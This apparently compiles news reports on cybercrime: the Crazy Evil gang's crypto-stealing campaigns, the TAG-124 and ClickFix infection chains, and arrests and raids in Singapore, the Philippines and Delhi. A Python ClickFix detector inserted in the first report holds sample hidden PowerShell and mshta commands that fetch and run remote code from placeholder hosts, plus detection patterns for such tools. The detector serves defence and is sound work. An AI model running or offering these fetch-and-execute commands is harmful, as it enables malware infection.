
Crazy Evil Gang Strikes Crypto Sector with StealC, AMOS, and Angel Drainer Malware

 


A Russian-speaking cybercrime syndicate, Crazy Evil, has been tied to more than 10 active social media scams, employing diverse tactics to trick victims into installing malicious software such as StealC, Atomic macOS Stealer (AMOS), and Angel Drainer.

"Specializing in identity fraud, cryptocurrency theft, and information-stealing malware, Crazy Evil operates a sophisticated network of traffers — social engineering specialists tasked with redirecting legitimate traffic to malicious phishing sites," stated Recorded Future's Insikt Group in their analysis.

The group's varied malware arsenal indicates that its targets include both Windows and macOS users, posing a significant threat to the decentralized finance sector.

Crazy Evil, active since at least 2021, operates mainly as a traffer team, redirecting legitimate traffic to fraudulent landing pages controlled by other criminal entities. It is allegedly run by a figure known as @AbrahamCrazyEvil on Telegram, where the group's channel (@CrazyEvilCorp) has over 4,800 subscribers.

Unlike typical scams that create counterfeit shopping websites for fraudulent transactions, Crazy Evil focuses on stealing digital assets, including NFTs, cryptocurrencies, payment card information, and online banking credentials. The group is believed to have generated over $5 million in illicit revenue, impacting thousands of devices worldwide.

The group's notoriety has grown following exit scams involving two other cybercrime outfits—Markopolo and CryptoLove—which were previously associated with a ClickFix campaign involving fake Google Meet pages in October 2024.

"Crazy Evil explicitly targets the cryptocurrency sector with custom spear-phishing lures," Recorded Future noted. "Crazy Evil traffers often spend days or even weeks scouting operations, identifying targets, and initiating engagements."

In addition to orchestrating attacks that deliver information stealers and wallet-draining malware, the group's leaders offer training materials and guidance for traffers, alongside an affiliate structure to delegate operations.

Crazy Evil is the second cybercrime group in recent years, after Telekopye, to be exposed operating primarily through Telegram. New recruits are guided by a Telegram bot controlled by the threat actor to various private channels, such as:

  • Payments: Announcing earnings for traffers
  • Logbar: Tracking information-stealer attacks and stolen data
  • Info: Offering regular updates on administrative and technical matters
  • Global Chat: A central space for communication, from work-related topics to casual discussions

The group operates through six sub-teams (AVLAND, TYPED, DELAND, ZOOMLAND, DEFI, and KEVLAND), each responsible for specific scams involving the installation of malicious tools via fake websites.

"As Crazy Evil continues to thrive, other cybercriminal groups are likely to mimic its tactics, urging security teams to stay alert to avoid large-scale breaches and loss of trust within the cryptocurrency, gaming, and software sectors," said Recorded Future.

This revelation follows the discovery of a traffic distribution system (TDS) named TAG-124, which overlaps with activity clusters linked to multiple threat groups, including Rhysida ransomware, Interlock ransomware, and SocGholish. This TDS is used in initial infection chains to distribute malware, such as the Remcos RAT and CleanUpLoader, which serves as a conduit for both Rhysida and Interlock ransomware.

"TAG-124 is composed of compromised WordPress sites, actor-controlled payload servers, and additional components," explained Recorded Future. "When specific criteria are met, these sites display fake Google Chrome update landing pages, leading to malware infections."

The use of TAG-124 further links the Rhysida and Interlock ransomware operations, with newer variants employing the ClickFix technique, in which the landing page places a command on the visitor's clipboard and instructs them to paste and run it, triggering the infection.
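Because a ClickFix lure ends with the victim pasting the command into the Windows Run dialog or a terminal, the resulting process creation carries traits an endpoint detection can key on: explorer.exe as the parent of a scripting host, a remote fetch piped into in-memory execution, a hidden window, and often a trailing "I am not a robot" comment that the lure appends so the pasted text looks harmless. The following Python is an added example, not code from the article or from Recorded Future; it runs a simple scoring rule over constructed Sysmon Event ID 1 style records, and the hostnames and URLs (example.invalid) are placeholders.

```python
"""ClickFix detection over process-creation telemetry.

Added example, not code from the article or from Recorded Future. The
records below are constructed Sysmon Event ID 1 style fields; hostnames
and URLs are placeholders (example.invalid).
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


# Binaries a victim ends up launching after pasting a ClickFix lure.
CLICKFIX_IMAGES = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "curl.exe", "msiexec.exe"}

# Command-line traits of pasted lures: fetch something remote, run it in
# memory, hide the window, or carry a trailing "# ... not a robot" comment.
INDICATORS = [
    ("remote_fetch", re.compile(
        r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|curl|wget|mshta\s+https?:)", re.I)),
    ("inline_exec", re.compile(r"\b(iex|invoke-expression)\b", re.I)),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I)),
    ("encoded_command", re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("captcha_tail", re.compile(r"#.{0,40}(not a robot|verification|captcha)", re.I)),
]


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse(ev: ProcessEvent) -> dict:
    """Score one event; a score of 3 or more is treated as a ClickFix candidate."""
    image, parent = _basename(ev.image), _basename(ev.parent_image)
    hits = [name for name, rx in INDICATORS if rx.search(ev.command_line)]
    score = len(hits)
    # Win+R launches its child from explorer.exe, so a scripting host with
    # explorer.exe as parent is the strongest structural signal (weight 2).
    if parent == "explorer.exe" and image in CLICKFIX_IMAGES:
        hits.append("run_dialog_parent")
        score += 2
    return {"image": image, "parent": parent, "indicators": hits,
            "score": score, "suspicious": score >= 3}


def scan(events):
    """Return the analysis dicts of all events flagged as suspicious."""
    return [r for r in map(analyse, events) if r["suspicious"]]


# Constructed sample telemetry: two ClickFix-style launches, three benign ones.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell -w hidden -c "iex (irm https://example.invalid/verify.txt)" '
                 '# "I am not a robot - reCAPTCHA Verification ID: 7811"'),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
                 "mshta https://example.invalid/update.hta"),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell -NoProfile -Command "Get-Service | Where-Object Status -eq Running"'),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\curl.exe",
                 "curl.exe -sSL https://example.invalid/tool.zip -o tool.zip"),
]

if __name__ == "__main__":
    for r in scan(SAMPLE_EVENTS):
        print(f"{r['parent']} -> {r['image']} score={r['score']} {r['indicators']}")
```

The weighting is deliberate: an interactive PowerShell launched from explorer.exe alone scores 2 and stays below the threshold, because users do open a shell from the Start menu, while the same parent plus any single command-line trait (a URL handed to mshta, a hidden window, an in-memory fetch) crosses it. Tune the regexes to the LOLBins your telemetry actually shows, and feed real events from Sysmon or 4688 with command-line auditing enabled.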

In a separate finding, more than 10,000 compromised WordPress sites have been used to distribute AMOS and SocGholish as part of client-side attacks.

"JavaScript loaded in the user's browser generates a fake page within an iframe," said researcher Himanshu Anand. "Attackers exploit outdated WordPress versions and plugins to avoid detection by websites lacking client-side monitoring tools."

Additionally, threat actors have leveraged the trust in platforms like GitHub to distribute malicious installers leading to the deployment of Lumma Stealer and other payloads, including SectopRAT, Vidar Stealer, and Cobalt Strike Beacon.

Trend Micro highlighted that this activity shares similarities with the tactics used by the threat actor Stargazer Goblin, known for utilizing GitHub repositories for payload distribution. However, the key difference is that the infection chain begins with compromised websites that redirect to malicious GitHub release links.

"The Lumma Stealer distribution method is evolving, with the attacker now using GitHub repositories to host malware," said security researchers Buddy Tancio, Fe Cureg, and Jovit Samaniego.

"The malware-as-a-service (MaaS) model makes it easier for cybercriminals to execute sophisticated cyberattacks, simplifying the spread of threats like Lumma Stealer."

In a comment to The Hacker News, Antonis Terefos, a reverse engineer at Check Point Research, noted that the Stargazer Goblin group has been observed "shifting from Atlantida Stealer to Lumma, and testing other stealers."

Six Hackers Linked to Worldwide Cyber Attacks Arrested in Singapore


Singaporean authorities have detained six people believed to be associated with a global cybercrime syndicate suspected of orchestrating malicious cyber activity around the world, according to recent reports.

The arrest was a result of an extensive operation carried out by various law enforcement agencies in Singapore, further highlighting the growing complexity and reach of organised cybercrime.

The notion that hackers work in relative isolation is far from the truth. The most substantial cyberattacks today are the work of organised crime or even state actors. These groups are well organised and may operate across multiple countries to achieve their objectives. To illustrate, North Korea-linked hacking units have stolen billions of dollars, largely through cryptocurrency heists. Such hackers do not work alone; they rely on other cybercriminals who supply them with stolen data, access to corporate infrastructure, or the tooling they use to deliver malware.

On September 9, 2024, Singapore police conducted a large-scale raid involving 160 officers from the Criminal Investigation Department, the Police Intelligence Department, the Special Operations Command, and the Internal Security Department. The raid covered several residential locations in Singapore and resulted in the arrest of six people: five Chinese nationals and one Singaporean. The suspects are believed to be members of an international cybercrime group that conducts its unlawful activities online across the world.

Official sources say the suspects are connected to a gang that was conducting malicious cyber activities from Singapore. The operation resulted in the seizure of several devices, including hacking tools and personal data stolen from victims outside Singapore, as well as malware control software such as PlugX, a remote access trojan. Authorities further say they have seized about $850,000 worth of cryptocurrency from the suspects.

Even with the six men in custody, investigations by the Singaporean police are still underway to map their local network and their connections with the worldwide syndicate. Further investigation may shed more light on how the cyber operations were executed from Singapore.

The arrests once again underscore the borderless nature of cybercrime, as criminal syndicates victimise private citizens, companies, and governments across the world. By moving quickly to arrest these suspects, Singapore has signalled its commitment to curbing cybercrime and underlined the importance of international cooperation, especially against emerging threats.

This is a reminder that cybercrime is a large and structured industry that extends well beyond the individual hacker. These criminal organisations are widely distributed, and their members perform distinct roles in an attack, from gaining unauthorised access to computer systems to deploying malware. The arrests are a win for law enforcement in Singapore, but also further proof of how systemic cybercrime has become at the global level.

International authorities must work together, especially as cybercriminals become more skilled and organised. Cooperation between countries, of which the recent Singapore arrests are only one example, helps dismantle such syndicates and bring their perpetrators to justice.



 

Philippines Police Rescues 2,700 Individuals from Cybercrime Syndicate

 

More than 2,700 workers from China, the Philippines, Vietnam, Indonesia, and over a dozen other countries were reportedly lured into working for shady online gaming sites and other cybercrime organisations, according to Philippine police who claimed they rescued them in a massive raid on Tuesday with the support of commandos. 

The number of victims of human trafficking rescued from seven buildings in Las Pinas city, metropolitan Manila, and the size of the midnight police raid were the biggest this year, demonstrating how the Philippines has developed into a significant hub for cybercrime syndicates.

With reports of people from the region and beyond being duped into accepting jobs in nations like conflict-torn Myanmar and Cambodia, cybercrime scams have grown to be a significant problem throughout Asia. However, a lot of these workers find themselves ensnared in a form of virtual slavery and compelled to take part in online frauds that prey on unsuspecting victims.

At a summit in Indonesia in May, ASEAN leaders decided to bolster border security, law enforcement, and public education in order to combat organised crime groups that smuggle people abroad and force them to engage in online fraud. 

According to Brig. Gen. Sydney Hernia, head of the national Philippine police's anti-cybercrime unit, police in Las Pinas, Philippines, raided and searched the buildings around midnight and freed 1,190 foreigners from at least 17 countries, including 604 Chinese, 183 Vietnamese, 137 Indonesians, 134 Malaysians, and 81 Thais. 

A further 1,534 Filipinos were also rescued, along with a handful of people from Nigeria, Sudan, Somalia, Yemen, Myanmar, Pakistan, and Taiwan. It was not immediately clear how many alleged syndicate leaders had been detained.

Earlier this year, in May, police said they freed over 1,400 Filipino and foreign workers who had allegedly been forced to work on cryptocurrency schemes during a raid on another suspected cybercrime camp at the Clark freeport in Mabalacat city, Pampanga province, north of Manila.

Police said that several of the employees testified to investigators that when they attempted to resign, they were required to pay a sizable sum for unclear reasons or they were concerned that they would be sold to other syndicates. They also added that employees were also required to pay fines for alleged workplace breaches. 

Facebook adverts promising good working conditions and high wages were used to lure the workers, but, according to officials, the claims turned out to be a deception.

Indonesian Minister Muhammad Mahfud, who handles political, legal, and security matters, told reporters that his country and other nations in the area had trouble cooperating with Myanmar on issues relating to cybercrime and its victims. He asserted that ASEAN must move forward on a long-proposed regional extradition convention in order to aid law enforcement in prosecuting offenders more quickly and stop the spread of cybercrime.

Delhi Police, FBI & Interpol in a Joint Operation Expose a Cybercrime Syndicate, Arrested Four


In a joint operation, Delhi Police, the Federal Bureau of Investigation (FBI), and Interpol have exposed an international cybercrime syndicate and arrested four of its members.

The four, including the alleged kingpin, were detained for defrauding US nationals of around $20 million.

According to a statement provided by a Delhi Police official, the information regarding the cybercrimes was received by their Intelligence Fusion & Strategic Operations (IFSO) unit – which deals with complex cybercrime cases – from the FBI and Interpol. The agencies indicated that “some international cybercriminals, in conspiracy with each other and with the aid and assistance of co-conspirators based in India, the US and Uganda, were running call centers by posing as employees of the US Internal Revenue Service, Social Security Administration, Drug Enforcement Administration, and other US agencies,” said H.G.S. Dhaliwal, Special Commissioner Police (Delhi Police Special Cell).

“We received information that one accused, Parth Armarkar, impersonated a specific living person by the name of Uttam Dhillon. During his career, the real Uttam Dhillon served as the Acting Administrator of the US Drug Enforcement Administration and as the Director of INTERPOL Washington. Armarkar defrauded victims of millions of USD through call centers operating in Uganda, Africa. He is an Indian national and occasionally visits India,” Dhaliwal said.

Armarkar allegedly defrauded victims of around $6 million via phony call centres in Uganda. Technical inputs provided by the FBI later helped Delhi Police arrest him in Ahmedabad, India, apparently the location from which he operated one segment of the syndicate.

Given the severity of the case, Delhi Police set up several teams from IFSO and the Counter Intelligence unit of the Special Cell to investigate.

Armarkar’s arrest was followed by the Delhi police tracking down the alleged leader of the syndicate, Vatsal Mehta. Further investigation led to the arrest of two more accused, Deepak Arora and Prashant Kumar. According to the police, the accused were on the FBI radar for a very long time.

As part of the coordinated action, the FBI has interviewed over 50 victims so far and collected evidence of fraud amounting to more than 20 million USD, which will be produced in court as per procedure. “Two victims from the US have also been examined through video calling by IFSO (Intelligence Fusion & Strategic Operations),” the officials noted.

The First Information Report (FIR) was lodged against the four accused under section 419 (cheating done by impersonation), 420 (cheating), 384 (extortion), 120B (criminal conspiracy), 34 (acts by many in furtherance of common intention) of the Indian Penal Code and sections 66C (identity theft) and 66D (impersonation) of the IT Act.